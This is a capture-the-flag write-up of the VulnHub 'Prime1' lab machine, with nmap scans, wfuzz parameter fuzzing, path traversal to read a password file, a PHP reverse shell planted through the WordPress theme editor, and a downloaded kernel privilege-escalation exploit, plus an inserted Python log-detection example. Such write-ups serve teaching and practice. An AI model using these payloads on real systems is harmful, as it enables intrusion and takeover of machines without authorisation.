# Prime1
Box download: https://download.vulnhub.com/prime/Prime_Series_Level-1.rar

## Information gathering

1. Identify the target address.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sn 192.168.186.0/24
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-08 07:26 EDT
Nmap scan report for 192.168.186.1 (192.168.186.1)
Host is up (0.00050s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.186.2 (192.168.186.2)
Host is up (0.00015s latency).
MAC Address: 00:50:56:EC:88:83 (VMware)
Nmap scan report for 192.168.186.134 (192.168.186.134)
Host is up (0.00020s latency).
MAC Address: 00:0C:29:C2:9C:9F (VMware)
Nmap scan report for 192.168.186.254 (192.168.186.254)
Host is up (0.00013s latency).
MAC Address: 00:50:56:E6:44:83 (VMware)
Nmap scan report for 192.168.186.128 (192.168.186.128)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.93 seconds
```

The target is 192.168.186.134.

2. Scan the target's open ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sT --min-rate 10000 -p- 192.168.186.134
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-08 07:28 EDT
Nmap scan report for 192.168.186.134 (192.168.186.134)
Host is up (0.00030s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:C2:9C:9F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.74 seconds
```

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sU --min-rate 10000 -p- 192.168.186.134
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-08 07:28 EDT
Warning: 192.168.186.134 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.186.134 (192.168.186.134)
Host is up (0.00066s latency).
All 65535 scanned ports on 192.168.186.134 (192.168.186.134) are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:C2:9C:9F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 72.98 seconds
```

Only ports 22 and 80 are open.

3. Service versions, default scripts and OS detection.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.186.134
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-08 07:31 EDT
Nmap scan report for 192.168.186.134 (192.168.186.134)
Host is up (0.00036s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
|   256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_  256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: HacknPentest
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:C2:9C:9F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.86 seconds
```

4. Scan with Nmap's vuln script category.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap --script=vuln -p22,80 192.168.186.134
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-08 07:29 EDT
Nmap scan report for 192.168.186.134 (192.168.186.134)
Host is up (0.00023s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
|   /wordpress/: Blog
|_  /wordpress/wp-login.php: Wordpress login page.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
MAC Address: 00:0C:29:C2:9C:9F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 321.35 seconds
```

## Port 80

> Directory scan

A WordPress site exists under this website.

> dev directory

The message on the page roughly says that the current web application is worth digging into further.

> For the directory scan, add a parameter specifying the .zip and .txt extensions

```bash
┌──(kali㉿kali)-[~/Desktop/bj]
└─$ dirb http://192.168.186.134/ -X .zip,.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Oct  8 07:44:53 2025
URL_BASE: http://192.168.186.134/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.zip,.txt) | (.zip)(.txt) [NUM = 2]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.186.134/ ----
+ http://192.168.186.134/secret.txt (CODE:200|SIZE:412)

-----------------
END_TIME: Wed Oct  8 07:44:59 2025
DOWNLOADED: 9224 - FOUND: 1
```

The gist of secret.txt is: fuzz the PHP files already found to discover the key parameter, and look at location.txt.

> Scan again, this time for .php files.

```bash
┌──(kali㉿kali)-[~/Desktop/bj]
└─$ dirb http://192.168.186.134/ -X .php -o php.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

OUTPUT_FILE: php.txt
START_TIME: Wed Oct  8 07:53:49 2025
URL_BASE: http://192.168.186.134/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.186.134/ ----
+ http://192.168.186.134/image.php (CODE:200|SIZE:147)
+ http://192.168.186.134/index.php (CODE:200|SIZE:136)

-----------------
END_TIME: Wed Oct  8 07:53:52 2025
DOWNLOADED: 4612 - FOUND: 2
```

> Fuzz the discovered PHP files to find the correct parameter

Reference: https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web

The default usage is:

```bash
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://website.com/secret.php?FUZZ=something
```

Adapted for this target (`--hh` hides responses of the given character count, i.e. the unchanged page):

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 147 http://192.168.186.134/image.php?FUZZ=123213
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.186.134/image.php?FUZZ=123213
Total requests: 951

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================


Total time: 0.395931
Processed Requests: 951
Filtered Requests: 951
Requests/sec.: 2401.929
```

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.186.134/index.php?FUZZ=something
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.186.134/index.php?FUZZ=something
Total requests: 951

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000341:   200        7 L      19 W       206 Ch      "file"

Total time: 0
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 0
```

The parameter "file" was found; pass it to index.php.

The response says we picked the wrong file. Earlier, secret.txt told us to look at location.txt, so pass that as the value of the file parameter.

```txt
ok well Now you reah at the exact parameter
Now dig some more for next one
use 'secrettier360' parameter on some other php page for more fun.
```

Use the secrettier360 parameter on another PHP page, which means image.php.

> Pass the parameter to image.php

We now have the correct parameter. What next?

> Thinking

With the correct parameter in hand, which vulnerability classes can be exploited through a parameter like this? ==> directory traversal (reading arbitrary files through the file-path parameter).

Viewing the page source shows a hint that there is a password.txt file in the /home/saket directory.

```txt
/home/saket/password.txt
```

Its content:

```txt
follow_the_ippsec
```

Could this be the SSH password for root, saket or victor?
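Before following the password lead, a look at the same steps from the defender's side. The following detection logic is an added example, my own and not part of the original writeup: it flags the two web-side patterns walked through above, a wfuzz-style burst of many distinct parameter names against one PHP file, and traversal sequences or absolute paths in a parameter value like the one used to read /home/saket/password.txt. The Apache access-log lines, the client IP and the Wfuzz user-agent are constructed for the example, not captured from the box.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache access-log lines modelled on the activity in this writeup;
# client IP, paths, timestamps and user-agents are placeholders, not real captures.
FUZZ_BURST = [
    f'192.168.186.128 - - [08/Oct/2025:07:53:50 -0400] "GET /image.php?{w}=123213 HTTP/1.1" 200 147 "-" "Wfuzz/3.1.0"'
    for w in ("admin", "id", "page", "user", "name", "test", "file")
]
SAMPLE_LOG = FUZZ_BURST + [
    '192.168.186.128 - - [08/Oct/2025:07:55:12 -0400] "GET /index.php?file=location.txt HTTP/1.1" 200 206 "-" "Mozilla/5.0"',
    '192.168.186.128 - - [08/Oct/2025:07:56:01 -0400] "GET /image.php?secrettier360=../../../home/saket/password.txt HTTP/1.1" 200 170 "-" "Mozilla/5.0"',
    '192.168.186.128 - - [08/Oct/2025:07:56:30 -0400] "GET /image.php?secrettier360=%2Fhome%2Fsaket%2Fpassword.txt HTTP/1.1" 200 170 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [08/Oct/2025:08:00:00 -0400] "GET /wordpress/?p=1 HTTP/1.1" 200 8312 "-" "Mozilla/5.0"',
]

# Combined-log format: client, ident, user, [time], "METHOD target PROTO", status, ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# A ".." path segment (slash or backslash separated) or a value that is an absolute path.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)|^/')

def parse_line(line):
    """Return (client_ip, path, [(param, value), ...], status) or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    params = parse_qsl(url.query, keep_blank_values=True)
    return m["ip"], url.path, params, int(m["status"])

def detect(lines, fuzz_threshold=5):
    """Return a sorted list of (rule, client_ip, path, detail) findings."""
    findings = []
    names_seen = defaultdict(set)  # (client, path) -> distinct query parameter names
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, params, _status = rec
        for name, value in params:
            names_seen[(ip, path)].add(name)
            decoded = unquote(unquote(value))  # parse_qsl decoded once; peel extra layers
            if TRAVERSAL_RE.search(decoded):
                findings.append(("path_traversal", ip, path, f"{name}={decoded}"))
    for (ip, path), names in names_seen.items():
        if len(names) >= fuzz_threshold:
            findings.append(("param_fuzzing", ip, path, f"{len(names)} distinct parameter names"))
    return sorted(findings)
```

On the sample above it reports one param_fuzzing finding for /image.php (8 distinct names) and two path_traversal findings, while the ordinary /wordpress/?p=1 request is left alone.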
Testing showed it is none of them, so only one possibility remains: it is the password of a WordPress account.

> WordPress

The post author's name is victor, so open the default WordPress login page and try the username victor with the password follow_the_ippsec.

Login succeeded.

> Check whether a shell can be obtained by uploading a plugin

Plugin to upload: a self-made empty zip "plugin"

```bash
┌──(kali㉿kali)-[~/Desktop/bj]
└─$ echo "Hello" > shell.txt

┌──(kali㉿kali)-[~/Desktop/bj]
└─$ zip shell ./shell.txt
  adding: shell.txt (stored 0%)

┌──(kali㉿kali)-[~/Desktop/bj]
└─$ ls
dirb.txt  php.txt  shell.txt  shell.zip
```

Upload the zip, then click Install Now.

It appears there is no write permission for plugin installation.

> Use the theme editor to find a PHP file with write permission and get a reverse shell

Eventually secret.php turned out to be a file whose contents can be updated, and it is a PHP file.

Update the file contents first; the update succeeds.

Then work out the file's path, guessing the target file's address from the current URL.

```bash
http://192.168.186.134/wordpress/wp-admin/theme-editor.php?file=secret.php&theme=twentynineteen
```

Given how WordPress lays out themes, secret.php is located at:

```bash
http://192.168.186.134/wordpress/wp-content/themes/twentynineteen/secret.php
```

> Build the reverse shell

PHP code:

```php
<?php exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.186.128/443 0>&1'"); ?>
```

Listen on the Kali machine:

```bash
sudo nc -lnvp 443
```

Request the target file; PHP's exec function runs and the reverse shell connects back.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nc -lnvp 443
listening on [any] 443 ...
connect to [192.168.186.128] from (UNKNOWN) [192.168.186.134] 46426
bash: cannot set terminal process group (1403): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ whoami
<ml/wordpress/wp-content/themes/twentynineteen$ whoami
www-data
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$
```

## Privilege escalation

```bash
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ sudo -l
<ml/wordpress/wp-content/themes/twentynineteen$ sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (root) NOPASSWD: /home/saket/enc
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$
```

> Look at the home directories

```bash
www-data@ubuntu:/home$ ls
ls
saket  victor
www-data@ubuntu:/home$ cd victor
cd victor
www-data@ubuntu:/home/victor$ ls
ls
ls: cannot open directory '.': Permission denied
www-data@ubuntu:/home/victor$ cd
cd
bash: cd: HOME not set
www-data@ubuntu:/home/victor$ cd ..
cd ..
www-data@ubuntu:/home$ cd saket
cd saket
www-data@ubuntu:/home/saket$ ls
ls
enc  password.txt  user.txt
www-data@ubuntu:/home/saket$ cat user.txt
cat user.txt
af3c658dcf9d7190da3153519c003456
www-data@ubuntu:/home/saket$ cat password.txt
cat password.txt
follow_the_ippsec
www-data@ubuntu:/home/saket$ cd enc
cd enc
bash: cd: enc: Not a directory
www-data@ubuntu:/home/saket$ cat enc
cat enc
cat: enc: Permission denied
www-data@ubuntu:/home/saket$
```

> Check the kernel

```bash
www-data@ubuntu:/home/saket$ uname -a
uname -a
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
```

> Search for a known privilege-escalation vulnerability affecting Ubuntu kernel 4.10.0

The second result is a local privilege escalation:

```bash
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
```

Download it to the current directory and inspect it.

```bash
┌──(kali㉿kali)-[~/Desktop/bj]
└─$ searchsploit -m 45010
  Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/45010
     Path: /usr/share/exploitdb/exploits/linux/local/45010.c
    Codes: CVE-2017-16995
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/Desktop/bj/45010.c
```

After reviewing the source, it only needs to be compiled and run, as its header describes:

```bash
gcc cve-2017-16995.c -o cve-2017-16995
internet@client:~/cve-2017-16995$ ./cve-2017-16995
```

> Transfer the file to the target with a temporary Python web server

Syntax:

```bash
python -m http.server [port]   # defaults to port 8000
```

```bash
┌──(kali㉿kali)-[~/Desktop/bj]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

On the target, fetch it with wget:

```bash
wget http://192.168.186.128:8000/45010.c
```

```bash
www-data@ubuntu:/tmp$ wget http://192.168.186.128:8000/45010.c
--2025-10-08 06:21:07--  http://192.168.186.128:8000/45010.c
Connecting to 192.168.186.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13176 (13K) [text/x-csrc]
Saving to: '45010.c'

     0K .......... ..                                         100% 54.8M=0s

2025-10-08 06:21:07 (54.8 MB/s) - '45010.c' saved [13176/13176]

www-data@ubuntu:/tmp$ ls
45010.c
www-data@ubuntu:/tmp$
```

Check whether it has execute permission.

```bash
www-data@ubuntu:/tmp$ ls -liah
791568 -rw-r--r--  1 www-data www-data  13K Oct  8 06:15 45010.c
```

Grant execute permission.

```bash
www-data@ubuntu:/tmp$ chmod +x 45010.c
www-data@ubuntu:/tmp$ ls -liah
791568 -rwxr-xr-x  1 www-data www-data  13K Oct  8 06:15 45010.c
```

Compile:

```bash
www-data@ubuntu:/tmp$ gcc 45010.c -o shell
www-data@ubuntu:/tmp$ ls -liah
791568 -rwxr-xr-x  1 www-data www-data  13K Oct  8 06:15 45010.c
791576 -rwxr-xr-x  1 www-data www-data  18K Oct  8 06:23 shell
```

Run the compiled binary:

```bash
www-data@ubuntu:/tmp$ ./shell
./shell
whoami
root
```

The current shell is not a full shell, however, so check whether a Python environment is available.

```bash
dpkg -l | grep python
```

- `dpkg -l` lists the packages installed on the system.

Python is present, so use Python to obtain a full bash.

```bash
python -c "import pty;pty.spawn('/bin/bash')"
```

```bash
www-data@ubuntu:/tmp$ ./shell
./shell
whoami
root
python -c "import pty;pty.spawn('/bin/bash')"
root@ubuntu:/tmp# whoami
whoami
root
```

```bash
root@ubuntu:/tmp# cd /root
root@ubuntu:/root# ls -liah
ls -liah
total 92K
917506 drwx------  5 root root 4.0K Aug 31  2019 .
     2 drwxr-xr-x 24 root root 4.0K Aug 29  2019 ..
964588 -rw-------  1 root root 8.4K Sep  1  2019 .bash_history
917598 -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
917597 drwx------  3 root root 4.0K Aug 30  2019 .cache
969791 -rw-------  1 root root  137 Aug 30  2019 .mysql_history
964098 drwxr-xr-x  2 root root 4.0K Aug 29  2019 .nano
917599 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
969796 -rw-r--r--  1 root root   66 Aug 31  2019 .selected_editor
969793 -rwxr-xr-x  1 root root  14K Aug 30  2019 enc
969795 -rw-r--r--  1 root root  305 Aug 30  2019 enc.cpp
969797 -rw-r--r--  1 root root  237 Aug 30  2019 enc.txt
969798 -rw-r--r--  1 root root  123 Aug 30  2019 key.txt
969794 -rw-r--r--  1 root root   33 Aug 30  2019 root.txt
969780 -rw-r--r--  1 root root  805 Aug 30  2019 sql.py
969790 -rwxr-xr-x  1 root root  442 Aug 31  2019 t.sh
964589 drwxr-xr-x 10 root root 4.0K Aug 30  2019 wfuzz
964464 -rw-r--r--  1 root root  170 Aug 29  2019 wordpress.sql
root@ubuntu:/root# cat root.txt
cat root.txt
b2b17036da1de94cfb024540a8e7075a
```

## Getting a full bash environment with Python

```bash
python -c "import pty;pty.spawn('/bin/bash')"
```

Command breakdown:

```txt
python -c: execute the single line of Python code that follows.
import pty: import Python's built-in pty module (pseudo-terminal module), which creates pseudo-terminal sessions that behave like a real terminal.
pty.spawn('/bin/bash'): start a /bin/bash process through the pty module and bind it to the pseudo-terminal, producing an interactive shell.
```
毛林
October 8, 2025, 21:49